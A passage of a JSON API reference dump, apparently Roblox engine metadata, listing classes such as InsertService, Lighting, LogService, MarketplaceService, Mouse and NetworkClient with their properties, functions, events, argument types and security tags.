,"type":"Event"},{"Arguments":[{"Name":"status","Type":"Status"}],"Name":"StatusRemoved","tags":["deprecated"],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"Strafing","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"speed","Type":"float"}],"Name":"Swimming","tags":[],"Class":"Humanoid","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"InputObject","tags":["notCreatable"]},{"ValueType":"Vector3","type":"Property","Name":"Delta","tags":[],"Class":"InputObject"},{"ValueType":"KeyCode","type":"Property","Name":"KeyCode","tags":[],"Class":"InputObject"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"InputObject"},{"ValueType":"UserInputState","type":"Property","Name":"UserInputState","tags":[],"Class":"InputObject"},{"ValueType":"UserInputType","type":"Property","Name":"UserInputType","tags":[],"Class":"InputObject"},{"Superclass":"Instance","type":"Class","Name":"InsertService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"AllowInsertFreeModels","tags":[],"Class":"InsertService"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"ApproveAssetId","tags":["deprecated"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"assetVersionId","Default":null}],"Name":"ApproveAssetVersionId","tags":["deprecated"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"instance","Default":null}],"Name":"Insert","tags":["deprecated"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enable","Default":null},{"Type":"bool","Name":"user","Default":"false"}],"Name":"SetAdvancedResults","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"assetUrl","Default":null}],"Name":"SetAssetUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"assetVersionUrl","Default":null}],"Name":"SetAssetVersionUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"baseSetsUrl","Default":null}],"Name":"SetBaseCategoryUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"baseSetsUrl","Default":null}],"Name":"SetBaseSetsUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"collectionUrl","Default":null}],"Name":"SetCollectionUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"freeDecalUrl","Default":null}],"Name":"SetFreeDecalUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"freeModelUrl","Default":null}],"Name":"SetFreeModelUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"trustLevel","Default":null}],"Name":"SetTrustLevel","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"userSetsUrl","Default":null}],"Name":"SetUserCategoryUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"userSetsUrl","Default":null}],"Name":"SetUserSetsUrl","tags":["LocalUserSecurity"],"Class":"InsertService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetBaseCategories","tags":["deprecated"],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[],"Name":"GetBaseSets","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"categoryId","Default":null}],"Name":"GetCollection","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"string","Name":"searchText","Default":null},{"Type":"int","Name":"pageNum","Default":null}],"Name":"GetFreeDecals","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"string","Name":"searchText","Default":null},{"Type":"int","Name":"pageNum","Default":null}],"Name":"GetFreeModels","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"GetLatestAssetVersionAsync","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetUserCategories","tags":["deprecated"],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetUserSets","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"LoadAsset","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"assetVersionId","Default":null}],"Name":"LoadAssetVersion","tags":[],"Class":"InsertService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"assetId","Default":null}],"Name":"loadAsset","tags":["deprecated"],"Class":"InsertService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"InstancePacketCache","tags":[]},{"Superclass":"Instance","type":"Class","Name":"IntConstrainedValue","tags":[]},{"ValueType":"int","type":"Property","Name":"ConstrainedValue","tags":["hidden"],"Class":"IntConstrainedValue"},{"ValueType":"int","type":"Property","Name":"MaxValue","tags":[],"Class":"IntConstrainedValue"},{"ValueType":"int","type":"Property","Name":"MinValue","tags":[],"Class":"IntConstrainedValue"},{"ValueType":"int","type":"Property","Name":"Value","tags":[],"Class":"IntConstrainedValue"},{"Arguments":[{"Name":"value","Type":"int"}],"Name":"Changed","tags":[],"Class":"IntConstrainedValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"int"}],"Name":"changed","tags":["deprecated"],"Class":"IntConstrainedValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"IntValue","tags":[]},{"ValueType":"int","type":"Property","Name":"Value","tags":[],"Class":"IntValue"},{"Arguments":[{"Name":"value","Type":"int"}],"Name":"Changed","tags":[],"Class":"IntValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"int"}],"Name":"changed","tags":["deprecated"],"Class":"IntValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"JointInstance","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"C0","tags":[],"Class":"JointInstance"},{"ValueType":"CoordinateFrame","type":"Property","Name":"C1","tags":[],"Class":"JointInstance"},{"ValueType":"Object","type":"Property","Name":"Part0","tags":[],"Class":"JointInstance"},{"ValueType":"Object","type":"Property","Name":"Part1","tags":[],"Class":"JointInstance"},{"ValueType":"Object","type":"Property","Name":"part1","tags":["deprecated","hidden"],"Class":"JointInstance"},{"Superclass":"JointInstance","type":"Class","Name":"DynamicRotate","tags":[]},{"ValueType":"float","type":"Property","Name":"BaseAngle","tags":[],"Class":"DynamicRotate"},{"Superclass":"DynamicRotate","type":"Class","Name":"RotateP","tags":[]},{"Superclass":"DynamicRotate","type":"Class","Name":"RotateV","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"Glue","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"F0","tags":[],"Class":"Glue"},{"ValueType":"Vector3","type":"Property","Name":"F1","tags":[],"Class":"Glue"},{"ValueType":"Vector3","type":"Property","Name":"F2","tags":[],"Class":"Glue"},{"ValueType":"Vector3","type":"Property","Name":"F3","tags":[],"Class":"Glue"},{"Superclass":"JointInstance","type":"Class","Name":"ManualSurfaceJointInstance","tags":[]},{"Superclass":"ManualSurfaceJointInstance","type":"Class","Name":"ManualGlue","tags":[]},{"Superclass":"ManualSurfaceJointInstance","type":"Class","Name":"ManualWeld","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"Motor","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentAngle","tags":[],"Class":"Motor"},{"ValueType":"float","type":"Property","Name":"DesiredAngle","tags":[],"Class":"Motor"},{"ValueType":"float","type":"Property","Name":"MaxVelocity","tags":[],"Class":"Motor"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"value","Default":null}],"Name":"SetDesiredAngle","tags":[],"Class":"Motor","type":"Function"},{"Superclass":"Motor","type":"Class","Name":"Motor6D","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"Rotate","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"Snap","tags":[]},{"Superclass":"JointInstance","type":"Class","Name":"VelocityMotor","tags":[]},{"ValueType":"float","type":"Property","Name":"CurrentAngle","tags":[],"Class":"VelocityMotor"},{"ValueType":"float","type":"Property","Name":"DesiredAngle","tags":[],"Class":"VelocityMotor"},{"ValueType":"Object","type":"Property","Name":"Hole","tags":[],"Class":"VelocityMotor"},{"ValueType":"float","type":"Property","Name":"MaxVelocity","tags":[],"Class":"VelocityMotor"},{"Superclass":"JointInstance","type":"Class","Name":"Weld","tags":[]},{"Superclass":"Instance","type":"Class","Name":"JointsService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[],"Name":"ClearJoinAfterMoveJoints","tags":[],"Class":"JointsService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"CreateJoinAfterMoveJoints","tags":[],"Class":"JointsService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"joinInstance","Default":null}],"Name":"SetJoinAfterMoveInstance","tags":[],"Class":"JointsService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"joinTarget","Default":null}],"Name":"SetJoinAfterMoveTarget","tags":[],"Class":"JointsService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ShowPermissibleJoints","tags":[],"Class":"JointsService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Keyframe","tags":[]},{"ValueType":"float","type":"Property","Name":"Time","tags":[],"Class":"Keyframe"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"pose","Default":null}],"Name":"AddPose","tags":[],"Class":"Keyframe","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetPoses","tags":[],"Class":"Keyframe","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"pose","Default":null}],"Name":"RemovePose","tags":[],"Class":"Keyframe","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"KeyframeSequence","tags":[]},{"ValueType":"bool","type":"Property","Name":"Loop","tags":[],"Class":"KeyframeSequence"},{"ValueType":"AnimationPriority","type":"Property","Name":"Priority","tags":[],"Class":"KeyframeSequence"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"keyframe","Default":null}],"Name":"AddKeyframe","tags":[],"Class":"KeyframeSequence","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetKeyframes","tags":[],"Class":"KeyframeSequence","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"keyframe","Default":null}],"Name":"RemoveKeyframe","tags":[],"Class":"KeyframeSequence","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"KeyframeSequenceProvider","tags":[]},{"ReturnType":"Instance","Arguments":[{"Type":"Content","Name":"assetId","Default":null}],"Name":"GetKeyframeSequence","tags":[],"Class":"KeyframeSequenceProvider","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"assetId","Default":null},{"Type":"bool","Name":"useCache","Default":null}],"Name":"GetKeyframeSequenceById","tags":[],"Class":"KeyframeSequenceProvider","type":"Function"},{"ReturnType":"Content","Arguments":[{"Type":"Instance","Name":"keyframeSequence","Default":null}],"Name":"RegisterActiveKeyframeSequence","tags":[],"Class":"KeyframeSequenceProvider","type":"Function"},{"ReturnType":"Content","Arguments":[{"Type":"Instance","Name":"keyframeSequence","Default":null}],"Name":"RegisterKeyframeSequence","tags":[],"Class":"KeyframeSequenceProvider","type":"Function"},{"ReturnType":"Dictionary","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"page","Default":"1"}],"Name":"GetAnimations","tags":[],"Class":"KeyframeSequenceProvider","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"Light","tags":[]},{"ValueType":"float","type":"Property","Name":"Brightness","tags":[],"Class":"Light"},{"ValueType":"Color3","type":"Property","Name":"Color","tags":[],"Class":"Light"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Light"},{"ValueType":"bool","type":"Property","Name":"Shadows","tags":[],"Class":"Light"},{"Superclass":"Light","type":"Class","Name":"PointLight","tags":[]},{"ValueType":"float","type":"Property","Name":"Range","tags":[],"Class":"PointLight"},{"Superclass":"Light","type":"Class","Name":"SpotLight","tags":[]},{"ValueType":"float","type":"Property","Name":"Angle","tags":[],"Class":"SpotLight"},{"ValueType":"NormalId","type":"Property","Name":"Face","tags":[],"Class":"SpotLight"},{"ValueType":"float","type":"Property","Name":"Range","tags":[],"Class":"SpotLight"},{"Superclass":"Light","type":"Class","Name":"SurfaceLight","tags":[]},{"ValueType":"float","type":"Property","Name":"Angle","tags":[],"Class":"SurfaceLight"},{"ValueType":"NormalId","type":"Property","Name":"Face","tags":[],"Class":"SurfaceLight"},{"ValueType":"float","type":"Property","Name":"Range","tags":[],"Class":"SurfaceLight"},{"Superclass":"Instance","type":"Class","Name":"Lighting","tags":["notCreatable"]},{"ValueType":"Color3","type":"Property","Name":"Ambient","tags":[],"Class":"Lighting"},{"ValueType":"float","type":"Property","Name":"Brightness","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"ColorShift_Bottom","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"ColorShift_Top","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"FogColor","tags":[],"Class":"Lighting"},{"ValueType":"float","type":"Property","Name":"FogEnd","tags":[],"Class":"Lighting"},{"ValueType":"float","type":"Property","Name":"FogStart","tags":[],"Class":"Lighting"},{"ValueType":"float","type":"Property","Name":"GeographicLatitude","tags":[],"Class":"Lighting"},{"ValueType":"bool","type":"Property","Name":"GlobalShadows","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"OutdoorAmbient","tags":[],"Class":"Lighting"},{"ValueType":"bool","type":"Property","Name":"Outlines","tags":[],"Class":"Lighting"},{"ValueType":"Color3","type":"Property","Name":"ShadowColor","tags":[],"Class":"Lighting"},{"ValueType":"string","type":"Property","Name":"TimeOfDay","tags":[],"Class":"Lighting"},{"ReturnType":"double","Arguments":[],"Name":"GetMinutesAfterMidnight","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetMoonDirection","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"GetMoonPhase","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetSunDirection","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"minutes","Default":null}],"Name":"SetMinutesAfterMidnight","tags":[],"Class":"Lighting","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"getMinutesAfterMidnight","tags":["deprecated"],"Class":"Lighting","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"minutes","Default":null}],"Name":"setMinutesAfterMidnight","tags":["deprecated"],"Class":"Lighting","type":"Function"},{"Arguments":[{"Name":"skyboxChanged","Type":"bool"}],"Name":"LightingChanged","tags":[],"Class":"Lighting","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"LocalWorkspace","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"LogService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"source","Default":null}],"Name":"ExecuteScript","tags":["RobloxScriptSecurity"],"Class":"LogService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetLogHistory","tags":[],"Class":"LogService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RequestServerOutput","tags":["RobloxScriptSecurity"],"Class":"LogService","type":"Function"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"messageType","Type":"MessageType"}],"Name":"MessageOut","tags":[],"Class":"LogService","type":"Event"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"messageType","Type":"MessageType"},{"Name":"timestamp","Type":"int"}],"Name":"ServerMessageOut","tags":["RobloxScriptSecurity"],"Class":"LogService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"LoginService","tags":[]},{"ReturnType":"void","Arguments":[],"Name":"Logout","tags":["RobloxSecurity"],"Class":"LoginService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"PromptLogin","tags":["RobloxSecurity"],"Class":"LoginService","type":"Function"},{"Arguments":[{"Name":"loginError","Type":"string"}],"Name":"LoginFailed","tags":["RobloxSecurity"],"Class":"LoginService","type":"Event"},{"Arguments":[{"Name":"username","Type":"string"}],"Name":"LoginSucceeded","tags":["RobloxSecurity"],"Class":"LoginService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"LuaSettings","tags":[]},{"ValueType":"bool","type":"Property","Name":"AreScriptStartsReported","tags":[],"Class":"LuaSettings"},{"ValueType":"double","type":"Property","Name":"DefaultWaitTime","tags":[],"Class":"LuaSettings"},{"ValueType":"int","type":"Property","Name":"GcFrequency","tags":[],"Class":"LuaSettings"},{"ValueType":"int","type":"Property","Name":"GcLimit","tags":[],"Class":"LuaSettings"},{"ValueType":"int","type":"Property","Name":"GcPause","tags":[],"Class":"LuaSettings"},{"ValueType":"int","type":"Property","Name":"GcStepMul","tags":[],"Class":"LuaSettings"},{"ValueType":"float","type":"Property","Name":"WaitingThreadsBudget","tags":[],"Class":"LuaSettings"},{"Superclass":"Instance","type":"Class","Name":"LuaSourceContainer","tags":[]},{"Superclass":"LuaSourceContainer","type":"Class","Name":"BaseScript","tags":[]},{"ValueType":"bool","type":"Property","Name":"Disabled","tags":[],"Class":"BaseScript"},{"ValueType":"Content","type":"Property","Name":"LinkedSource","tags":[],"Class":"BaseScript"},{"Superclass":"BaseScript","type":"Class","Name":"CoreScript","tags":["notCreatable"]},{"Superclass":"BaseScript","type":"Class","Name":"Script","tags":[]},{"ValueType":"ProtectedString","type":"Property","Name":"Source","tags":["PluginSecurity"],"Class":"Script"},{"ReturnType":"string","Arguments":[],"Name":"GetHash","tags":["RobloxPlaceSecurity"],"Class":"Script","type":"Function"},{"Superclass":"Script","type":"Class","Name":"LocalScript","tags":[]},{"Superclass":"LuaSourceContainer","type":"Class","Name":"ModuleScript","tags":[]},{"ValueType":"Content","type":"Property","Name":"LinkedSource","tags":[],"Class":"ModuleScript"},{"ValueType":"ProtectedString","type":"Property","Name":"Source","tags":["PluginSecurity"],"Class":"ModuleScript"},{"Superclass":"Instance","type":"Class","Name":"LuaWebService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"MarketplaceService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"string","Name":"productId","Default":null}],"Name":"PromptNativePurchase","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"productId","Default":null},{"Type":"bool","Name":"equipIfPurchased","Default":"true"},{"Type":"CurrencyType","Name":"currencyType","Default":"Default"}],"Name":"PromptProductPurchase","tags":[],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"assetId","Default":null},{"Type":"bool","Name":"equipIfPurchased","Default":"true"},{"Type":"CurrencyType","Name":"currencyType","Default":"Default"}],"Name":"PromptPurchase","tags":[],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"string","Name":"productId","Default":null}],"Name":"PromptThirdPartyPurchase","tags":["RobloxPlaceSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"assetId","Default":null},{"Type":"int","Name":"robuxAmount","Default":null}],"Name":"ReportAssetSale","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ReportRobuxUpsellStarted","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"ticket","Default":null},{"Type":"int","Name":"playerId","Default":null},{"Type":"int","Name":"productId","Default":null}],"Name":"SignalClientPurchaseSuccess","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"productId","Default":null},{"Type":"bool","Name":"success","Default":null}],"Name":"SignalPromptProductPurchaseFinished","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"assetId","Default":null},{"Type":"bool","Name":"success","Default":null}],"Name":"SignalPromptPurchaseFinished","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SignalServerLuaDialogClosed","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetDeveloperProductsAsync","tags":[],"Class":"MarketplaceService","type":"YieldFunction"},{"ReturnType":"Dictionary","Arguments":[{"Type":"int","Name":"assetId","Default":null},{"Type":"InfoType","Name":"infoType","Default":"Asset"}],"Name":"GetProductInfo","tags":[],"Class":"MarketplaceService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"assetId","Default":null}],"Name":"PlayerOwnsAsset","tags":[],"Class":"MarketplaceService","type":"YieldFunction"},{"Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"ClientLuaDialogRequested","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"ticket","Type":"string"},{"Name":"playerId","Type":"int"},{"Name":"productId","Type":"int"}],"Name":"ClientPurchaseSuccess","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"productId","Type":"string"},{"Name":"wasPurchased","Type":"bool"}],"Name":"NativePurchaseFinished","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"userId","Type":"int"},{"Name":"productId","Type":"int"},{"Name":"isPurchased","Type":"bool"}],"Name":"PromptProductPurchaseFinished","tags":["deprecated"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"productId","Type":"int"},{"Name":"equipIfPurchased","Type":"bool"},{"Name":"currencyType","Type":"CurrencyType"}],"Name":"PromptProductPurchaseRequested","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"assetId","Type":"int"},{"Name":"isPurchased","Type":"bool"}],"Name":"PromptPurchaseFinished","tags":[],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"assetId","Type":"int"},{"Name":"equipIfPurchased","Type":"bool"},{"Name":"currencyType","Type":"CurrencyType"}],"Name":"PromptPurchaseRequested","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"serverResponseTable","Type":"Dictionary"}],"Name":"ServerPurchaseVerification","tags":["RobloxScriptSecurity"],"Class":"MarketplaceService","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"productId","Type":"string"},{"Name":"receipt","Type":"string"},{"Name":"wasPurchased","Type":"bool"}],"Name":"ThirdPartyPurchaseFinished","tags":["RobloxPlaceSecurity"],"Class":"MarketplaceService","type":"Event"},{"ReturnType":"ProductPurchaseDecision","Arguments":[{"Name":"receiptInfo","Type":"Dictionary"}],"Name":"ProcessReceipt","tags":[],"Class":"MarketplaceService","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"Message","tags":["deprecated"]},{"ValueType":"string","type":"Property","Name":"Text","tags":[],"Class":"Message"},{"Superclass":"Message","type":"Class","Name":"Hint","tags":["deprecated"]},{"Superclass":"Instance","type":"Class","Name":"Mouse","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"Hit","tags":["readonly"],"Class":"Mouse"},{"ValueType":"Content","type":"Property","Name":"Icon","tags":[],"Class":"Mouse"},{"ValueType":"CoordinateFrame","type":"Property","Name":"Origin","tags":["readonly"],"Class":"Mouse"},{"ValueType":"Object","type":"Property","Name":"Target","tags":["readonly"],"Class":"Mouse"},{"ValueType":"Object","type":"Property","Name":"TargetFilter","tags":[],"Class":"Mouse"},{"ValueType":"NormalId","type":"Property","Name":"TargetSurface","tags":["readonly"],"Class":"Mouse"},{"ValueType":"Ray","type":"Property","Name":"UnitRay","tags":["readonly"],"Class":"Mouse"},{"ValueType":"int","type":"Property","Name":"ViewSizeX","tags":["readonly"],"Class":"Mouse"},{"ValueType":"int","type":"Property","Name":"ViewSizeY","tags":["readonly"],"Class":"Mouse"},{"ValueType":"int","type":"Property","Name":"X","tags":["readonly"],"Class":"Mouse"},{"ValueType":"int","type":"Property","Name":"Y","tags":["readonly"],"Class":"Mouse"},{"ValueType":"CoordinateFrame","type":"Property","Name":"hit","tags":["deprecated","hidden","readonly"],"Class":"Mouse"},{"ValueType":"Object","type":"Property","Name":"target","tags":["deprecated","readonly"],"Class":"Mouse"},{"Arguments":[],"Name":"Button1Down","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Button1Up","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Button2Down","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Button2Up","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Idle","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[{"Name":"key","Type":"string"}],"Name":"KeyDown","tags":["deprecated"],"Class":"Mouse","type":"Event"},{"Arguments":[{"Name":"key","Type":"string"}],"Name":"KeyUp","tags":["deprecated"],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"Move","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"WheelBackward","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[],"Name":"WheelForward","tags":[],"Class":"Mouse","type":"Event"},{"Arguments":[{"Name":"key","Type":"string"}],"Name":"keyDown","tags":["deprecated"],"Class":"Mouse","type":"Event"},{"Superclass":"Mouse","type":"Class","Name":"PlayerMouse","tags":[]},{"Superclass":"Mouse","type":"Class","Name":"PluginMouse","tags":[]},{"Arguments":[{"Name":"instances","Type":"Objects"}],"Name":"DragEnter","tags":["PluginSecurity"],"Class":"PluginMouse","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"NetworkMarker","tags":["notbrowsable"]},{"Arguments":[],"Name":"Received","tags":[],"Class":"NetworkMarker","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"NetworkPeer","tags":["notbrowsable"]},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"limit","Default":null}],"Name":"SetOutgoingKBPSLimit","tags":["PluginSecurity"],"Class":"NetworkPeer","type":"Function"},{"Superclass":"NetworkPeer","type":"Class","Name":"NetworkClient","tags":["notCreatable"]},{"ValueType":"string","type":"Property","Name":"Ticket","tags":[],"Class":"NetworkClient"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"blockDuration","Default":"3000"}],"Name":"Disconnect","tags":["LocalUserSecurity"],"Class":"NetworkClient","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"string","Name":"server","Default":null},{"Type":"int","Name":"serverPort","Default":null},{"Type":"int","Name":"clientPort","Default":"0"},{"Type":"int","Name":"threadSleepTime","Default":"30"}],"Name":"PlayerConnect","tags":["PluginSecurity"],"Class":"NetworkClient","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"gameSessionID","Default":null}],"Name":"SetGameSessionID","tags":["RobloxSecurity"],"Class":"NetworkClient","type":"Function"},{"Arguments":[{"Name":"peer","Type":"string"},{"Name":"replicator","Type":"Instance"}],"Name":"ConnectionAccepted","tags":[],"Class":"NetworkClient","type":"Event"},{"Arguments":[{"Name":"peer","Type":"string"},{"Name":"code","Type":"int"},{"Name":"reason","Type":"string"}],"Name":"ConnectionFailed","tags":[],"Class":"NetworkClient","type":"Event"},{"Arguments":[{"Name":"peer","Type":"string"}],"Name":"ConnectionRejected","tags":[],"Class":"NetworkClient","type":"Event"},{"Superclass":"NetworkPeer","type":"Class","Name":"NetworkServer","tags":["notCreatable"]},{"ValueType":"int","type":"Property","Name":"Port","tags":["readonly"],"Class":"NetworkServer"},{"ReturnType":"void","Arguments":[],"Name":"ConfigureAsCloudEditServer","tags":["RobloxSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ConfigureAsTeamTestServer","tags":["RobloxSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetClientCount","tags":["LocalUserSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetIsPlayerAuthenticationRequired","tags":["RobloxSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"void","Arguments":[